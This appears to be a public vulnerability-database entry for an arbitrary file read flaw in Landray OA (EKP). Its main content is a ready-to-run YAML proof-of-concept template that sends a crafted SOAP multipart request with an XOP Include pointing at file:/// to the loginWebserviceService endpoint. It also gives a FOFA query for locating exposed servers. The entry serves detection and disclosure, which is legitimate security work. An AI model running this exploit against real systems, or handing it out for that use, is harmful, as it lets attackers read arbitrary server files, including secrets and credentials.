landray-oa-loginWebserviceService-fileread: Landray OA loginWebserviceService File Read

2025-08-01 蓝凌EKP PoC Public

Description

Landray OA System loginWebserviceService interface has an arbitrary file read vulnerability.

The vulnerability exists in the getLoginSessionId method which can be exploited to read arbitrary files on the system.

fofa: body="Com_Parameter"

PoC

id: landray-oa-loginWebserviceService-fileread
info:
  name: Landray OA loginWebserviceService File Read
  author: ZacharyZcR
  severity: high
  verified: true
  description: |-
    Landray OA System loginWebserviceService interface has an arbitrary file read vulnerability.
    The vulnerability exists in the getLoginSessionId method which can be exploited to read arbitrary files on the system.
    fofa: body="Com_Parameter"
  reference:
    - https://github.com/wy876/POC/blob/9f20511bb02d7babac30c47f48a72d427b7f5a3b/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88.md
  tags: landray,fileread
  created: 2024/12/30

set:
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /sys/webservice/loginWebserviceService
      headers:
        Content-Type: multipart/related; boundary=----WebKitFormBoundary{{rboundary}}
        SOAPAction: ""
        Accept-Encoding: gzip, deflate
      body: |
        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="a"

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://sso.authentication.sys.kmss.landray.com/">
        <soapenv:Header/>
        <soapenv:Body>
            <web:getLoginSessionId>
                <arg0>
                    <beginTimeStamp>a</beginTimeStamp>
                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></count>
                </arg0>
            </web:getLoginSessionId>
        </soapenv:Body>
        </soapenv:Envelope>
        ------WebKitFormBoundary{{rboundary}}--
    expression: response.status == 500 && response.body.bcontains(b'Unmarshalling Error')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities